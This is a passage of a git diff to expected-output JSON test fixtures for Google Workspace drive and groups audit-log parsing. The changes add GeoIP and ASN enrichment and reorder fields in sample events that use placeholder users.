- }, - { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-10-02T15:00:00.000Z", "file": { "owner": "owner", @@ -1263,8 +1431,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:08.398375400Z", + "ingested": "2021-12-14T14:45:08.345001109Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"untrash\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "untrash", @@ -1280,21 +1469,12 @@ "name": "foo", "domain": "bar.com", "id": "1" - } - }, - { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-10-02T15:00:00.000Z", "file": { "owner": "owner", @@ -1342,8 +1522,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:08.398381300Z", + "ingested": "2021-12-14T14:45:08.345001623Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"sheets_import_range\",\"parameters\":[{\"name\":\"sheets_import_range_recipient_doc\",\"value\":\"1234\"},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "sheets_import_range", @@ -1359,21 +1560,12 @@ "name": "foo", "domain": "bar.com", "id": "1" - } - }, - { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-10-02T15:00:00.000Z", "file": { "owner": "owner", @@ -1421,8 +1613,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:08.398387Z", + "ingested": "2021-12-14T14:45:08.345002014Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"trash\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "trash", @@ -1438,21 +1651,12 @@ "name": "foo", "domain": "bar.com", "id": "1" - } - }, - { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-10-02T15:00:00.000Z", "file": { "owner": "owner", @@ -1500,8 +1704,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:08.398392700Z", + "ingested": "2021-12-14T14:45:08.345002421Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"remove_lock\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "remove_lock", @@ -1517,21 +1742,12 @@ "name": "foo", "domain": "bar.com", "id": "1" - } - }, - { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-10-02T15:00:00.000Z", "file": { "owner": "owner", @@ -1579,8 +1795,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:08.398398400Z", + "ingested": "2021-12-14T14:45:08.345002804Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"upload\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "upload", @@ -1596,21 +1833,12 @@ "name": "foo", "domain": "bar.com", "id": "1" - } - }, - { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-10-02T15:00:00.000Z", "file": { "owner": "owner", @@ -1659,8 +1887,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:08.398404Z", + "ingested": "2021-12-14T14:45:08.345003193Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"view\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"shared_drive_id\",\"value\":\"1234\"}]}}", "provider": "drive", "action": "view", @@ -1676,21 +1925,12 @@ "name": "foo", "domain": "bar.com", "id": "1" - } - }, - { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-10-02T15:00:00.000Z", "file": { "owner": "owner", @@ -1742,8 +1982,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:08.398409700Z", + "ingested": "2021-12-14T14:45:08.345003582Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"acl_change\",\"name\":\"change_acl_editors\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"new_value\",\"value\":\"owner\"},{\"name\":\"old_value\",\"value\":\"writers\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"old_visibility\",\"value\":\"people_within_domain_with_link\"},{\"name\":\"visibility_change\",\"value\":\"external\"}]}}", "provider": "drive", "action": "change_acl_editors", @@ -1761,21 +2022,12 @@ "name": "foo", "domain": "bar.com", "id": "1" - } - }, - { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-10-02T15:00:00.000Z", "file": { "owner": "owner", @@ -1828,8 +2080,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:08.398415Z", + "ingested": "2021-12-14T14:45:08.345003969Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"acl_change\",\"name\":\"change_document_access_scope\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"new_value\",\"value\":\"owner\"},{\"name\":\"old_value\",\"value\":\"writers\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"old_visibility\",\"value\":\"people_within_domain_with_link\"},{\"name\":\"visibility_change\",\"value\":\"external\"},{\"name\":\"target_domain\",\"value\":\"all\"}]}}", "provider": "drive", "action": "change_document_access_scope", @@ -1847,21 +2120,12 @@ "name": "foo", "domain": "bar.com", "id": "1" - } - }, - { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-10-02T15:00:00.000Z", "file": { "owner": "owner", @@ -1914,8 +2178,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:08.398418500Z", + "ingested": "2021-12-14T14:45:08.345004467Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"acl_change\",\"name\":\"change_document_visibility\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"new_value\",\"value\":\"owner\"},{\"name\":\"old_value\",\"value\":\"writers\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"old_visibility\",\"value\":\"people_within_domain_with_link\"},{\"name\":\"visibility_change\",\"value\":\"external\"},{\"name\":\"target_domain\",\"value\":\"all\"}]}}", "provider": "drive", "action": "change_document_visibility", @@ -1933,21 +2218,12 @@ "name": "foo", "domain": "bar.com", "id": "1" - } - }, - { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-10-02T15:00:00.000Z", "file": { "owner": "owner", @@ -2000,8 +2276,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:08.398423Z", + "ingested": "2021-12-14T14:45:08.345004874Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"acl_change\",\"name\":\"shared_drive_membership_change\",\"parameters\":[{\"name\":\"added_role\",\"value\":\"editor\"},{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"removed_role\",\"value\":\"content_manager\"},{\"name\":\"membership_change_type\",\"value\":\"add_to_shared_drive\"},{\"name\":\"target\",\"value\":\"user@example.com\"}]}}", "provider": "drive", "action": "shared_drive_membership_change", @@ -2019,21 +2316,12 @@ "name": "foo", "domain": "bar.com", "id": "1" - } - }, - { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-10-02T15:00:00.000Z", "file": { "owner": "owner", @@ -2086,8 +2374,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:08.398428200Z", + "ingested": "2021-12-14T14:45:08.345005260Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"acl_change\",\"name\":\"shared_drive_settings_change\",\"parameters\":[{\"name\":\"new_settings_state\",\"value\":\"restricted\"},{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"old_settings_state\",\"value\":\"unrestricted\"},{\"name\":\"shared_drive_settings_change_type\",\"value\":\"direct_acl\"},{\"name\":\"target\",\"value\":\"user@example.com\"}]}}", "provider": "drive", "action": "shared_drive_settings_change", @@ -2105,21 +2414,12 @@ "name": "foo", "domain": "bar.com", "id": "1" - } - }, - { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-10-02T15:00:00.000Z", "file": { "owner": "owner", @@ -2167,8 +2467,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:08.398433200Z", + "ingested": "2021-12-14T14:45:08.345005657Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"acl_change\",\"name\":\"sheets_import_range_access_change\",\"parameters\":[{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"sheets_import_range_recipient_doc\",\"value\":\"1234\"}]}}", "provider": "drive", "action": "sheets_import_range_access_change", @@ -2186,21 +2507,12 @@ "name": "foo", "domain": "bar.com", "id": "1" - } - }, - { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-10-02T15:00:00.000Z", "file": { "owner": "owner", @@ -2254,8 +2566,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:08.398437400Z", + "ingested": "2021-12-14T14:45:08.345006038Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"acl_change\",\"name\":\"change_user_access\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"new_value\",\"value\":\"can_comment\"},{\"name\":\"old_value\",\"value\":\"can_view\"},{\"name\":\"old_visibility\",\"value\":\"people_with_link\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"target_user\",\"value\":\"user@example.com\"},{\"name\":\"visibility\",\"value\":\"private\"},{\"name\":\"visibility_change\",\"value\":\"external\"}]}}", "provider": "drive", "action": "change_user_access", @@ -2273,7 +2606,10 @@ "name": "foo", "domain": "bar.com", "id": "1" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/google_workspace/data_stream/groups/_dev/test/pipeline/test-groups.log-expected.json b/packages/google_workspace/data_stream/groups/_dev/test/pipeline/test-groups.log-expected.json index 0f63c344638..00ab7129f4a 100644 --- a/packages/google_workspace/data_stream/groups/_dev/test/pipeline/test-groups.log-expected.json +++ b/packages/google_workspace/data_stream/groups/_dev/test/pipeline/test-groups.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" @@ -51,8 +39,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:12.286029Z", + "ingested": "2021-12-14T14:45:12.889089404Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"acl_change\",\"name\":\"change_acl_permission\",\"parameters\":[{\"name\":\"acl_permission\",\"value\":\"can_add_members\"},{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"new_value_repeated\",\"multiValue\":[\"managers\",\"members\"]},{\"name\":\"old_value_repeated\",\"multiValue\":[\"managers\"]}]}}", "provider": "groups", "action": "change_acl_permission", @@ -76,24 +85,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" @@ -124,8 +124,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:12.286032300Z", + "ingested": "2021-12-14T14:45:12.889091802Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"accept_invitation\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"}]}}", "provider": "groups", "action": "accept_invitation", @@ -150,24 +171,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" @@ -202,8 +214,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:12.286037800Z", + "ingested": "2021-12-14T14:45:12.889092255Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"approve_join_request\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}", "provider": "groups", "action": 